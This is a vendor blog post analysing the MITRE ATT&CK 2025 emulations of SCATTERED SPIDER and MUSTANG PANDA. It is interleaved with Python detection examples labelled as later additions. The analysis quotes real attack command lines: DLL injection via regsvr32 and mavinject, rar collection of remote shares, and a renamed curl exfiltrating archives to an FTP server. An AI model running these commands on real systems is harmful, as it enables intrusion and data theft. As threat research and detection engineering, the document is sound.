Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations – Sophos News

By Admin
December 16, 2025


Every year, a number of security solution providers – including Sophos – take part in MITRE's ATT&CK Enterprise Evaluations, a full-scale cyberattack emulation covering several scenarios based on real-world threat actors and their tactics, techniques, and procedures (TTPs).

The evaluation is designed to provide a realistic (and transparent – the results are publicly available) appraisal of security solutions' performance, based on end-to-end attack chains that include initial access, persistence, lateral movement, and impact. Emulations typically include a multi-device 'customer' environment, complete with endpoints, servers, domain-joined devices, and Active Directory-managed users.

2025 marked the fifth year of Sophos participating – and, as we did last year, we wanted to provide some insight into what this year's evaluation (which came complete with several Game of Thrones references) entailed, and to show how true to life it actually is. In particular, we'll dive into the realism of the tooling, nuances in the testing methodology, and Sophos' protection and detection capabilities. While we can't cover everything, due to the sheer number of steps in each scenario, we'll discuss a selection, highlighting the depth and accuracy of the emulations.

For the 2025 evaluation, MITRE selected two threat categories: a cybercriminal threat actor based on SCATTERED SPIDER (GOLD HARVEST), and a China-based threat actor based on MUSTANG PANDA (BRONZE PRESIDENT). Both are significant and prominent threats. The former, being predominantly financially motivated, is known for extortion and ransomware, and has been linked to several high-profile attacks in recent years – including a ransomware attack against a UK retailer, a data breach targeting an Australian airline, and attacks against large US casino and resort operators. The latter threat actor is focused on espionage and information theft, and has targeted numerous government and non-government organizations across multiple countries since at least 2012.

MITRE's SCATTERED SPIDER emulation comprised one scenario: a threat actor acquiring initial access and then proceeding along the entire attack chain, with the added complexity of pivoting from an on-premises environment to cloud infrastructure. The MUSTANG PANDA emulation, on the other hand, consisted of two separate sub-scenarios. The first (dubbed ORPHEUS) involved the entire attack chain, while the second (PERSEUS) covered initial access, collection, and exfiltration. Each sub-scenario featured a distinct malware family, both associated with the real-world threat actor.

The first scenario involved an emulated cybercriminal threat actor, based on real-world threat intelligence concerning SCATTERED SPIDER. This scenario covered the entire attack chain, including initial access, discovery, lateral movement, credential access, persistence, collection, and exfiltration.

Notably, this scenario involved the threat actor moving laterally from their initial compromise of an on-premises environment to an Amazon Web Services (AWS)-hosted environment. SCATTERED SPIDER is one of a limited number of cybercrime groups known to target and modify cloud infrastructure, and which uses a broad and adaptive collection of open-source and publicly available tools.

The TTPs chosen for the cybercriminal scenario were drawn from a range of public reporting, giving MITRE flexibility in their emulation of SCATTERED SPIDER and their interpretation of that reporting. Interestingly, the use of stealer malware – previously observed in SCATTERED SPIDER intrusions – was absent from the scenario.

Initial access

The threat actor began their attack by sending a spearphishing email to the user tlannister, from the address it@kingslanding-it[.]net. Researchers have previously observed SCATTERED SPIDER impersonating targeted organisations' brands in phishing campaigns, using the –[.]net email address format, and SCATTERED SPIDER is known to use other phishing techniques including Adversary-in-the-Middle (AiTM) attacks.

As for the email itself, it contained a link to a malicious AiTM site. The subject was "ACTION: SSO Updates Completed – Reauthentication Needed," likely designed to create a sense of urgency, and to prime the recipient to accept the subsequent authentication prompt on the AiTM site as legitimate.

When tlannister authenticated to the AiTM site, the threat actor obtained valid static credentials and Single Sign-On (SSO) session cookies. Replaying the stolen cookies provided access to the SSO solution, with a valid account for the organization.

Next, the threat actor enrolled their device in the SSO solution (something that researchers have seen SCATTERED SPIDER do). They then successfully connected to the host dragongate via Remote Desktop (RDP), and gained access to Outlook Web Access (OWA), indicating a valid SSO session.


Figure 1: Sophos XDR detections showing cookies stolen via session replay being used for authentication and device registration

Discovery

Via their RDP session on the dragongate host, the threat actor then executed several discovery commands using cmd.exe:

  • whoami: returns the active user's domain and username
  • ping google.com: checks external network connectivity
  • wmic product get name, version: enumerates installed software, including security products; versions may indicate patch levels and possible vulnerabilities
  • nltest /dclist: lists Active Directory (AD) domain controllers
  • nltest /domain_trusts: lists trusted AD domains
  • ping redkeep.kingslanding.net: 'redkeep' is the domain controller, identified from listing the Active Directory domain controllers

It's worth noting that several of these commands were also executed during legitimate administrator activity elsewhere in this scenario. In themselves, these commands did not necessarily indicate malicious activity, but, in our assessment, they warranted investigation nonetheless, owing to the context. For example, some nltest commands were executed in the context of a PowerShell process, run by a user logged in via RDP from an external IP address, and were commands that were rarely executed on that device.
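The point above is that the commands alone are weak signals and the context (remote session from outside the network, an unusual parent process, rarity on the host) is what makes them worth investigating. The following is an added illustration of that scoring, not Sophos' detection logic or code from the article: it runs a small context-aware rule over constructed process telemetry for the dragongate session and for routine admin activity on another host. The field names, weights, threshold and sample events are assumptions made for this example.

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass

# Address ranges treated as "inside" the organisation (assumption for this example;
# substitute the real corporate ranges). Anything else is scored as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# The discovery commands from the article, with a base weight per command family.
DISCOVERY_PATTERNS = (
    (re.compile(r"^whoami\b"), 1),
    (re.compile(r"^ping\s+\S+"), 1),
    (re.compile(r"^wmic\s+product\s+get\b"), 2),
    (re.compile(r"^nltest\s+/(dclist|domain_trusts)\b"), 2),
)


@dataclass
class ProcEvent:
    host: str
    user: str
    cmdline: str
    parent: str            # image name of the parent process
    logon_type: str        # "rdp" for a remote interactive session, "interactive" for console
    source_ip: str         # origin of the session, "" when local
    seen_before_30d: bool  # same command line seen on this host in the previous 30 days


def is_external(ip: str) -> bool:
    if not ip:
        return False
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def score_event(ev: ProcEvent) -> int:
    """0 for non-discovery commands; otherwise the base weight plus context modifiers."""
    cmd = ev.cmdline.strip().lower()
    base = next((w for pat, w in DISCOVERY_PATTERNS if pat.search(cmd)), 0)
    if base == 0:
        return 0
    score = base
    if ev.logon_type == "rdp" and is_external(ev.source_ip):
        score += 2  # remote session originating outside the network
    if ev.parent.lower().endswith("powershell.exe"):
        score += 1  # discovery driven from a script host rather than an admin console
    if not ev.seen_before_30d:
        score += 1  # rare on this host
    return score


def suspicious_sessions(events, threshold=6):
    """Sum scores per (host, user, source_ip) session; return the sessions over the threshold."""
    totals = defaultdict(int)
    cmds = defaultdict(list)
    for ev in events:
        s = score_event(ev)
        if s:
            key = (ev.host, ev.user, ev.source_ip)
            totals[key] += s
            cmds[key].append(ev.cmdline)
    return {k: cmds[k] for k, t in totals.items() if t >= threshold}


# Constructed sample telemetry. 203.0.113.10 is a documentation range standing in for
# an internet address; host and user names follow the article's scenario.
SAMPLE_EVENTS = [
    ProcEvent("dragongate", "tlannister", "whoami", "cmd.exe", "rdp", "203.0.113.10", False),
    ProcEvent("dragongate", "tlannister", "ping google.com", "cmd.exe", "rdp", "203.0.113.10", False),
    ProcEvent("dragongate", "tlannister", "wmic product get name, version", "cmd.exe", "rdp", "203.0.113.10", False),
    ProcEvent("dragongate", "tlannister", "nltest /dclist", "powershell.exe", "rdp", "203.0.113.10", False),
    ProcEvent("dragongate", "tlannister", "nltest /domain_trusts", "powershell.exe", "rdp", "203.0.113.10", False),
    # Routine administration: the same commands, console logon, seen regularly on this host.
    ProcEvent("citadel", "sysadmin", "nltest /dclist", "cmd.exe", "interactive", "", True),
    ProcEvent("citadel", "sysadmin", "whoami", "cmd.exe", "interactive", "", True),
]

if __name__ == "__main__":
    for key, cmdlines in suspicious_sessions(SAMPLE_EVENTS).items():
        print(key, cmdlines)
```

The admin session on citadel scores 3 in total and stays below the threshold, while the same commands in the dragongate RDP session from an external address score well above it; the per-session sum is what separates the two, not any single command.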

Next, the threat actor downloaded the Active Directory enumeration tool ADExplorer from the Microsoft Sysinternals site using Firefox, then launched the tool to explore administrator groups. SCATTERED SPIDER is known to have downloaded ADExplorer, and other publicly available tools, from their original source sites.


Figure 2: The threat actor uses ADExplorer.exe to list members of the Domain Admins group

The threat actor proceeded to access the Z: shared drive on a file server named CITADEL (this drive was already mapped for the tlannister user). Files opened by the threat actor included a network architecture diagram.

While there is limited public information on SCATTERED SPIDER's use of shared drives, researchers have reported on the threat actor searching SharePoint instances. That being said, its flexible tactics and tooling suggest that accessing shared drives is credible in the scenario.

We also noted that the threat actor in this scenario created an inbox rule to delete emails containing the keyword AirByte. Public reporting indicates that SCATTERED SPIDER has used various Extract, Transform, Load (ETL) tools, including AirByte, to synchronize and exfiltrate data from targeted environments. Researchers have also found that the threat actor has anticipated future AirByte configuration changes that could trigger an investigation, and suppressed change notification alerts using email rules.

Lateral movement, persistence, and credential access

The cookies previously stolen by the threat actor enabled them to access the organization's SSO system as the user tlannister. This provided the attacker with access to integrated applications, including the AWS console, without requiring a new authentication event on the organization's identity provider platform.

We observed that in AWS CloudTrail, an AWS security monitoring and governance tool, there was an AwsConsoleSignIn event, indicating that a user had assumed an SSO role via the Authentik SAML (Security Assertion Markup Language) provider – the open-source SSO system used by the targeted organization in this scenario.


Figure 3: Sophos XDR (Taegis) detections for a user performing AWS discovery actions after single-factor authentication via SAML

There were several suspicious aspects of this console login:

  • A login via SAML, but without multifactor authentication (MFA)
  • A user login from a previously unseen IP address
  • A console login, immediately followed by AWS cloud service discovery activity

The attacker then enumerated several AWS services – something SCATTERED SPIDER is known to do – including Billing and Cost Management (likely to establish what kinds of services the targeted organization was using), Identity and Access Management (IAM) users & groups, S3 buckets, EC2 network information, and EC2 instance information. This rapid enumeration of AWS services by a single user triggered a detection (AWS Console Enumeration Activity).

Following this enumeration, the threat actor then began to remotely execute commands. They achieved this using AWS Systems Manager, which allows command execution on EC2 instances with the AWS Systems Manager Agent deployed.

Specifically, the threat actor ran the AWS Systems Manager document AWS-RunPowerShellScript to execute a PowerShell command on several instances. AWS CloudTrail records SendCommand events from Systems Manager. While parameters for SendCommand documents are redacted by default in AWS CloudTrail logs for security reasons, EDR telemetry can be used to determine the command executed. The targeted instances for the PowerShell command were the on-premises Windows hosts, rather than the Linux cloud instance hosts. However, it's worth noting that there was some crossover here; the on-premises hosts were actually instances in the same AWS organization as the cloud instances, which is an atypical environment.

Next, the threat actor ran the AWS Systems Manager document AWS-GatherSoftwareInventory to collect detailed software inventory information from managed AWS EC2 instances – including installed applications, processes, updates and patches. This information is useful to an attacker as it can tell them where they are likely to find information relevant to their objectives. In this scenario, the attacker was interested in systems containing confidential business information.

While public reporting on SCATTERED SPIDER describes its use of AWS Systems Manager's AWS-GatherSoftwareInventory document to profile cloud instance hosts, we are not aware of any coverage concerning its use of SendCommand AWS-RunPowerShellScript for remote command execution on cloud instance hosts. However, there are reports of SCATTERED SPIDER using the equivalent Azure Run Command.

The threat actor then established persistent access to AWS by creating a new IAM user ahightower, via AWS IAM CreateUser, and attached a user policy to the new user via AWS IAM AttachUserPolicy.

This attached policy provided administrative privileges. Attaching an administrative policy to a new AWS IAM user is unusual, and therefore warrants investigation. Researchers have observed SCATTERED SPIDER creating AWS IAM users with naming conventions similar to existing legitimate users, and then assigning access keys to enable programmatic access.
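Two of the CloudTrail patterns described above (the SAML console login without MFA from a new address followed by a burst of service enumeration, and CreateUser followed by AttachUserPolicy granting administrative rights) can both be checked from the raw event stream. The following is an added example written for this article, not Sophos' or AWS's detection code: it runs two rules over constructed CloudTrail-style records. The record shape follows CloudTrail's public field names (eventName, eventSource, userIdentity.arn, sourceIPAddress, additionalEventData.MFAUsed, requestParameters), the account id is the AWS documentation placeholder 111122223333, and the known-IP list, window and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

ACCOUNT = "111122223333"  # AWS documentation placeholder account id (constructed)


def parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def principal(ev):
    ui = ev.get("userIdentity", {})
    return ui.get("arn") or ui.get("userName") or ui.get("principalId", "")


def detect_risky_console_logins(events, known_ips, window_minutes=15, min_services=3):
    """Flag ConsoleLogin events that are federated without MFA, come from an unknown
    IP, or are followed within the window by read-only calls across several services."""
    by_principal = defaultdict(list)
    for ev in events:
        by_principal[principal(ev)].append(ev)
    findings = []
    for who, evs in by_principal.items():
        evs.sort(key=lambda e: parse_time(e["eventTime"]))
        for i, ev in enumerate(evs):
            if ev.get("eventName") != "ConsoleLogin":
                continue
            reasons = []
            extra = ev.get("additionalEventData", {})
            if extra.get("SamlProviderArn") and extra.get("MFAUsed") == "No":
                reasons.append("saml-login-without-mfa")
            if ev.get("sourceIPAddress") not in known_ips:
                reasons.append("new-source-ip")
            t0 = parse_time(ev["eventTime"])
            services = set()  # distinct services touched by Describe*/List*/Get* after login
            for later in evs[i + 1:]:
                if parse_time(later["eventTime"]) - t0 > timedelta(minutes=window_minutes):
                    break
                if later.get("eventName", "").startswith(("Describe", "List", "Get")):
                    services.add(later.get("eventSource"))
            if len(services) >= min_services:
                reasons.append(f"enumeration-of-{len(services)}-services")
            if reasons:
                findings.append({"principal": who, "time": ev["eventTime"], "reasons": reasons})
    return findings


def detect_admin_user_creation(events):
    """Flag CreateUser followed by AttachUserPolicy of AdministratorAccess to that same user."""
    created, findings = {}, []
    for ev in sorted(events, key=lambda e: parse_time(e["eventTime"])):
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        params = ev.get("requestParameters") or {}
        if ev.get("eventName") == "CreateUser":
            created[params.get("userName")] = ev["eventTime"]
        elif ev.get("eventName") == "AttachUserPolicy":
            user, arn = params.get("userName"), params.get("policyArn", "")
            if user in created and arn.endswith(":policy/AdministratorAccess"):
                findings.append({"user": user, "created": created[user], "policy": arn, "by": principal(ev)})
    return findings


def _ev(time, source, name, who, ip, **extra):
    rec = {"eventTime": time, "eventSource": source, "eventName": name,
           "userIdentity": {"arn": who}, "sourceIPAddress": ip}
    rec.update(extra)
    return rec


SSO_ROLE = f"arn:aws:sts::{ACCOUNT}:assumed-role/AWSReservedSSO_Admin/tlannister"
ADMIN_USER = f"arn:aws:iam::{ACCOUNT}:user/sysadmin"
KNOWN_IPS = {"192.168.1.20"}

# Constructed sample CloudTrail records; 203.0.113.10 is a documentation-range stand-in.
SAMPLE_EVENTS = [
    # Routine: IAM user with MFA from a known office address, a single read call.
    _ev("2025-10-01T09:00:00Z", "signin.amazonaws.com", "ConsoleLogin", ADMIN_USER, "192.168.1.20",
        additionalEventData={"MFAUsed": "Yes"}),
    _ev("2025-10-01T09:01:00Z", "s3.amazonaws.com", "ListBuckets", ADMIN_USER, "192.168.1.20"),
    # Scenario pattern: SAML sign-in without MFA from a new address, then a discovery burst.
    _ev("2025-10-01T10:00:00Z", "signin.amazonaws.com", "ConsoleLogin", SSO_ROLE, "203.0.113.10",
        additionalEventData={"SamlProviderArn": f"arn:aws:iam::{ACCOUNT}:saml-provider/authentik",
                             "MFAUsed": "No"}),
    _ev("2025-10-01T10:01:00Z", "ce.amazonaws.com", "GetCostAndUsage", SSO_ROLE, "203.0.113.10"),
    _ev("2025-10-01T10:02:00Z", "iam.amazonaws.com", "ListUsers", SSO_ROLE, "203.0.113.10"),
    _ev("2025-10-01T10:02:30Z", "s3.amazonaws.com", "ListBuckets", SSO_ROLE, "203.0.113.10"),
    _ev("2025-10-01T10:03:00Z", "ec2.amazonaws.com", "DescribeInstances", SSO_ROLE, "203.0.113.10"),
    # Persistence: a new IAM user is granted AdministratorAccess.
    _ev("2025-10-01T10:10:00Z", "iam.amazonaws.com", "CreateUser", SSO_ROLE, "203.0.113.10",
        requestParameters={"userName": "ahightower"}),
    _ev("2025-10-01T10:11:00Z", "iam.amazonaws.com", "AttachUserPolicy", SSO_ROLE, "203.0.113.10",
        requestParameters={"userName": "ahightower",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
]

if __name__ == "__main__":
    print(detect_risky_console_logins(SAMPLE_EVENTS, KNOWN_IPS))
    print(detect_admin_user_creation(SAMPLE_EVENTS))
```

The sysadmin login produces no finding because none of the three conditions holds; the SSO session is flagged on all three, and the IAM rule ties the AttachUserPolicy back to the CreateUser that preceded it so the analyst sees who created the user and when.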

The attacker next used AWS federation features to pivot from AWS Command Line Interface (CLI) access keys to AWS Console access for the new user. This technique is implemented in the open-source AWS Consoler tool, which SCATTERED SPIDER has used in the past.


Figure 4: Sophos XDR (Taegis) detection for the threat actor using AWS Federation features to create an interactive session

Subsequently, the attacker provisioned a new EC2 instance named goldroad for remote access. The Sophos EDR agent was automatically deployed to this new instance using a CloudFormation stack, providing visibility of the attacker's activity on their new bastion host.

The initial remote access mechanism used by the threat actor was EC2 Serial Console with SSH (SCATTERED SPIDER has been observed leveraging Azure's serial console feature for remote access). EC2 Serial Console access uses a virtual serial port that is independent of the instance's network access, and which does not require configuration of the virtual private cloud's (VPC) security groups. Serial console access does not generate standard remote access network traffic.


Figure 5: Sophos XDR (Taegis) detection showing an SSH public key being uploaded to an EC2 instance for remote access via Instance Connect

The threat actor then performed discovery activity to identify secrets providing access to targeted business information, by invoking the AWS Secrets Manager ListSecrets command – again, something that SCATTERED SPIDER has done in the past.

We observed calls to BatchGetSecretValue and GetSecretValue, with requestParameters indicating that a Gitlab Personal Access Token secret for the user atargaryen was the target. The attacker decrypted this secret by calling DecryptValue.

Next, the threat actor downloaded two tools designed for secret discovery: trufflehog and jecretz. As previously noted, SCATTERED SPIDER often downloads publicly available and open-source tools from their original source, including these two.

trufflehog is a credential / secrets scanner that supports scanning on a number of platforms. Here, the threat actor executed it against Gitlab, authenticated using a Gitlab personal access token (PAT), likely acquired from AWS Secrets Manager.

jecretz is described as a "Jira Secrets Hunter," designed to "find credentials and sensitive contents in Jira tickets." In the scenario, the threat actor executed jecretz against a Wekan Kanban instance using tlannister's static credentials – likely obtained from the initial phishing attack.

The threat actor then installed the remote monitoring & management tool Tactical RMM on several on-premises hosts, using AWS Systems Manager's AWS-RunPowerShellScript document. SCATTERED SPIDER is known to use a variety of remote monitoring and management tools, including the open-source Tactical RMM.

The URL for the Tactical RMM configuration impersonated the kingslanding domain. Impersonating targeted organizations is, as mentioned previously, also a tactic that researchers have observed SCATTERED SPIDER using.


Figure 6: Sophos XDR detection showing Tactical RMM installation via the AWS Systems Manager document AWS-RunPowerShellScript, with the configuration domain kingslanding-hr[.]com

Collection and exfiltration

Towards the end of the scenario, the threat actor prepared to exfiltrate data via the cloud infrastructure. They deployed the wstunnel tool (downloaded from the tool's GitHub repository, again in line with SCATTERED SPIDER's documented behaviors) to their goldroad instance.

wstunnel uses outbound WebSocket protocol traffic to bypass firewalls and proxies. AWS EC2 VPC (Virtual Private Cloud) default security groups allow all outbound traffic by default, but do not allow the remote inbound connections that are necessary for direct remote access methods like SSH or RDP. Using WebSockets for the tunnel therefore does not require additional VPC security group configuration, avoiding logged events in AWS CloudTrail.


Figure 7: Sophos XDR (Taegis) process telemetry showing the wstunnel client process using WebSockets to connect to a remote server

The threat actor used the wstunnel tunnel to connect to their goldroad instance via SSH, rather than the EC2 serial console. Public reporting on SCATTERED SPIDER intrusions describes the use of several SSH tunnelling tools, including OpenSSH and RevShell.

From the tunnelled SSH session, the threat actor executed the AirByte configuration utility abctl to discover platform status and credentials; as noted previously, SCATTERED SPIDER is known to use AirByte and similar tools for exfiltration.

Using AirByte, the threat actor staged files from the target cloud-hosted Gitlab and Wekan systems to an S3 bucket. As covered above, email notifications of AirByte configuration changes were suppressed by the email deletion rule previously configured by the threat actor.

The attacker then downloaded the CyberDuck file browser and transfer utility (a tool researchers have described SCATTERED SPIDER using in real-world campaigns) to an on-premises host, using Firefox, and transferred files from the staging S3 bucket in the targeted organization's AWS account to an attacker-controlled S3 bucket in another AWS account.


Figure 8: Sophos XDR (Taegis) detection for suspected data exfiltration from S3, based on rapid retrieval of multiple objects

The second scenario emulated a China-based threat actor, based on real-world threat intelligence concerning MUSTANG PANDA (BRONZE PRESIDENT). There were two distinct sub-scenarios within this wider scenario, covering three distinct attack tools used by this threat actor.

The first sub-scenario (steps 1-6), ORPHEUS, covered the entire attack chain including initial access, discovery, lateral movement, credential access, persistence, collection, and exfiltration. The malware used in the ORPHEUS sub-scenario is very similar to TONESHELL, a backdoor reported earlier in 2025, while the VSCode tunnel abuse resembled an approach described in 2024, during a campaign in which a threat actor targeted government entities in Southeast Asia.

Unlike previous years, steps 7-9 of Scenario 2 featured a separate sub-scenario (PERSEUS), covering initial access, collection, and exfiltration. The PERSEUS execution chain emulated the PlugX malware and the more recent 'SmugX' (PlugX plus HTML smuggling) attack chains.

ORPHEUS (Steps 1-6)

Initial access and defense evasion

The initial access stage began with a malicious Office document, sent as an email attachment. This document (Strategic Competition with Pentos – Assessing Braavos Competitiveness Beyond Essos.docx) contained an embedded link that led to the download of the archive file 250325_Pentos_Board_minutes.rar.

This archive file contained a LNK file (Essos Competitiveness Brief.lnk) which executed the binary EssosUpdate.exe – a legitimate Windows utility (wsdebug_host.exe) that sideloaded a malicious DLL, wsdapi.dll. This DLL acted as a loader for the ORPHEUS payload.

EssosUpdate.exe then re-executed wsdapi.dll using regsvr32.exe, with the command:

C:\Windows\System32\regsvr32.exe /s "C:\Users\htargaryen\Downloads\wsdapi.dll"

regsvr32.exe spawned C:\Windows\System32\waitfor.exe Event183785251387 and then used mavinject to inject wsdapi.dll into waitfor.exe:

C:\Windows\System32\mavinject.exe 8344 /INJECTRUNNING "C:\Users\htargaryen\Downloads\wsdapi.dll"

Based on the attack chain, we assessed that this sub-scenario was emulating MUSTANG PANDA/BRONZE PRESIDENT and the TONESHELL malware. For instance, the execution of the LNK file appeared similar to that described in some reporting, which specifically calls out that:

Mustang Panda employs DLL sideloading techniques, typically bundling malicious tools within RAR archives paired with legitimate, signed binaries.

LNK file lures and DLL sideloading have long been popular techniques associated with MUSTANG PANDA. For instance, in 2022, Secureworks (now a Sophos company) reported that:

The malware is embedded within RAR archive files. Opening the archive on a Windows computer with default settings displays a Windows shortcut (LNK) file.

To execute the malware, the recipient must click the Windows shortcut file. The shortcut executes a renamed legitimate file contained in the eighth hidden folder. Alongside the legitimate file is a malicious DLL and an encrypted payload file.

A large part of this attack chain emulation appeared to be directly linked to Trend Micro's report on TONESHELL. For instance, we observed the following similarities:

  • The same sideload -> regsvr32.exe -> mavinject.exe -> waitfor.exe injection chain (waitfor.exe Event19030000000 was used in the real-world attack; waitfor.exe Event183785251387 in the emulation)
  • Both samples implemented custom exception handlers
  • Both samples used the ws2_32 send API for C2 communication
  • Both samples decrypted and executed shellcode once running in their target process.

Discovery

For the discovery step, MITRE opted to execute only a handful of commands from the injected C2 process (waitfor.exe).

netstat -anop tcp
ipconfig /all
mswin1.exe 10.55.4.0/24

These three discovery commands were likely intended to represent how the adversary discovered the file servers/domain controller and all workstations in the environment. In a real-world attack, we'd typically expect to see more detailed enumeration occurring at this stage – although the paucity of commands could have been a reference to MUSTANG PANDA's stealth and evasive capabilities.

The use of mswin1.exe (SharpNBTScan, a NetBIOS scanning tool) in this step was similar to the approach described in Unit 42's report on Stately Taurus. In that campaign, the attacker used SharpNBTScan renamed as win1.exe.

Lateral movement, persistence, and credential access

The ORPHEUS threat actor used PsExec for lateral movement, to drop and execute the script CodeHelper.bat. This batch file established a secondary C2 channel via a Visual Studio Code (VSCode) Tunnel.

VSCode abuse is a relatively recent technique that researchers have previously attributed to MUSTANG PANDA. For instance, in September 2024, Unit 42 reported on the threat actor using code tunnels for C2.

Lateral movement in the ORPHEUS scenario occurred from the initially compromised endpoint to the domain controller, using the same account. While it's possible that a domain admin account could be initially compromised, it's somewhat atypical to see an attack move from initial access straight to a domain controller, without any credential theft or privilege escalation. However, this aspect of the emulation may reflect the fact that MUSTANG PANDA's lures are often highly targeted (for instance, focusing on government officials).

Once the code tunnel was established, the ORPHEUS threat actor stole a copy of NTDS.dit, using vssadmin to create a shadow copy of the file and cmd.exe to copy it to the initially compromised machine. The SYSTEM registry hive was also dumped using reg.exe, as this contains the boot key needed to decrypt NTDS.dit.

For persistence, the ORPHEUS threat actor created a code tunnel on the initially compromised machine through a scheduled task named AccessoryInputServices.

We observed several similarities between the TTPs in this step and Unit 42's reporting:

  • startcode.bat was used in the real-world attack to execute the code tunnel; MITRE used CodeHelper.bat
  • PsExec was used for lateral movement
  • NTDS.dit dumping
  • A similar naming convention for the scheduled task name (WindowsEdgeUpdateServices in the real-world attack, AccessoryInputServices in the simulation)

Collection and exfiltration

The ORPHEUS threat actor executed WinRAR through the code tunnel to collect sensitive data:

"C:\Program Files\WinRAR\rar.exe" a -r -v250m -hpj5Tft5lLFFcQK -x*appdata -x*ProgramData* -x*Recovery* "-x*System Volume Information*" -x*$RECYCLE.BIN* "-x*Program Files*" "-x*Program Files (x86)*" -x*Windows* -x*Python312* -x*crash_dumps* -x*PerfLogs* -n@C:\Users\htargaryen\Downloads\files.txt C:\Windows\Temp\A.rar \\10.55.3.105\A$\*

The command executed here is similar to that described by Unit 42:

rar.exe a -r -v250m -x*appdata  -n@1.txt .rar D$*

Both commands read the file collection pattern from a txt file, and target the remote share drives of network hosts.

For exfiltration, a renamed version of curl was dropped and executed to exfiltrate the archive files to a remote FTP server.

"C:\Program Files\Microsoft VS Code\prpbg.dat.bak.1" -T "{C:\windows\temp\C.rar,C:\windows\temp\E.rar,C:\windows\temp\F.rar,C:\windows\temp\G.rar,C:\windows\temp\H.rar,C:\windows\temp\J.rar}" ftp://ftp_user:Gracious-Coat@[IP]/do/ --ftp-create-dirs

This approach is similar to previously observed MUSTANG PANDA behavior:

  • Renaming curl and dropping it to C:\ProgramData\IDM\log.log
  • Exfiltrating RAR archives of sensitive data to an attacker-controlled FTP server

PERSEUS (steps 7-9)

Steps 7-9 consisted of a separate sub-scenario (PERSEUS), where we observed initial access again on a new host – followed by collection, exfiltration, and indicator removal.

Initial access

The PERSEUS threat actor achieved initial access using a malicious link delivered via email. This email directed the user to an HTML smuggling web page. HTML smuggling has gained popularity as a method of evading network-based detections. Researchers have previously observed MUSTANG PANDA using HTML smuggling to deliver PlugX malware (in a campaign known as 'SmugX').
The HTML smuggling code used by MITRE (Figure 9) contains several similarities to the example in the Check Point article linked above.


Figure 9: HTML smuggling code used in the PERSEUS sub-scenario

Both implementations were heavily obfuscated and made use of the window.atob function to obfuscate function calls.

Additionally, both implementations hid the invocation of createObjectURL by using identical obfuscated strings, which were concatenated slightly differently. MITRE used 'Y3JlYX'+'RlT2Jq'+'ZWN0VV'+'JM', while MUSTANG PANDA used 'Y3JlYXRl' + 'T2JqZWN' + '0VVJM'. This string decodes to "createObjectURL", which is used in HTML smuggling to create an object URL for the payload.
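Splitting a base64 string into differently sized chunks defeats a literal search for 'Y3JlYXRlT2JqZWN0VVJM' but not a scanner that joins the chunks before decoding. The following is an added example written for this article, not MITRE's, Check Point's or Sophos' code: it finds quoted base64 pieces joined with '+' in an HTML page, decodes the joined string, and reports any that name a browser API commonly used by smuggling pages. The sample HTML is constructed; the watch-list and the regular expressions are assumptions for this example.

```python
import base64
import binascii
import re

# Browser API names that HTML smuggling pages typically hide behind atob()-decoded strings
# (assumption for this example; extend as needed).
WATCHLIST = {"createObjectURL", "Blob", "atob", "msSaveOrOpenBlob", "download", "click"}

# A quoted string literal made only of base64 alphabet characters ...
LITERAL = r"""['"][A-Za-z0-9+/=]+['"]"""
# ... optionally repeated with '+' between the pieces, e.g. 'Y3JlYX'+'RlT2Jq'+'ZWN0VV'+'JM'.
CONCAT_RE = re.compile(rf"(?:{LITERAL}\s*\+\s*)*{LITERAL}")
PIECE_RE = re.compile(r"""['"]([A-Za-z0-9+/=]+)['"]""")


def decode_concatenation(expr):
    """Join the quoted pieces of expr and base64-decode them.
    Returns the decoded text, or None if it is not valid base64 / not printable ASCII."""
    joined = "".join(PIECE_RE.findall(expr))
    padded = joined + "=" * (-len(joined) % 4)  # chunked strings often drop the padding
    try:
        raw = base64.b64decode(padded, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_hidden_api_names(html):
    """Return (expression, decoded_name) for every concatenation that decodes to a watched API."""
    hits = []
    for m in CONCAT_RE.finditer(html):
        decoded = decode_concatenation(m.group(0))
        if decoded in WATCHLIST:
            hits.append((m.group(0), decoded))
    return hits


# Constructed sample page: the createObjectURL chunks are the ones quoted in the article;
# the Blob chunks and the harmless 'hello' + 'world' literal are added for contrast.
SAMPLE_HTML = """
<script>
var b = new window[atob('Qmxv'+'Yg')]([bin], {type: 'application/octet-stream'});
var u = URL[window.atob('Y3JlYX'+'RlT2Jq'+'ZWN0VV'+'JM')](b);
var msg = 'hello' + 'world';
</script>
"""

if __name__ == "__main__":
    for expr, name in find_hidden_api_names(SAMPLE_HTML):
        print(f"{expr} -> {name}")
```

The MUSTANG PANDA spacing ('Y3JlYXRl' + 'T2JqZWN' + '0VVJM') is handled by the `\s*` around the '+', and a single unchunked literal is matched too because the repeated group is optional; 'hello' + 'world' is rejected because its decoded bytes are not ASCII.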

In the PERSEUS sub-scenario, HTML smuggling led to the download of an MSI file named 2025p2.msi. When executed, this file installed an emulation of PlugX through sideloading and dynamic code execution.

Here's a brief overview of the infection chain:

  1. 2025p2.msi dropped gup.exe, WinGUpdate.dat (the PlugX payload) and libcurl.dll (the PlugX loader) to disk
  2. The MSI installation then executed gup.exe, which sideloaded libcurl.dll
  3. libcurl.dll loaded and decrypted WinGUpdate.dat, which led to execution of the PlugX payload
  4. The PlugX payload communicated with the attacker's C2 server
  5. A decoy PDF (Meeting Invitation.pdf) opened and was displayed to the user
  6. The PERSEUS threat actor established persistence through the creation of a run key (WinGupSvc).

As before, this approach contains several similarities to that detailed in Check Point's coverage:

  • Both MSI installers were delivered via HTML smuggling
  • Both installers executed a PlugX loader through sideloading
  • Both loaders read the final RC4-encrypted payload from a .DAT file (data.dat in the real-world attack, WinGUpdate.dat in the emulation)
  • Both implementations presented the user with a decoy PDF document
  • Both implementations established persistence through a registry run key.

